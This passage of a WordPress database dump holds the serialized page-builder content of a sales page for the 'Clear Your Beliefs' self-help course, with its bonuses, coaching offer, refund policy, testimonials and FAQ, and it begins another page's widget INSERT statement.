are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1552, 2005, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" 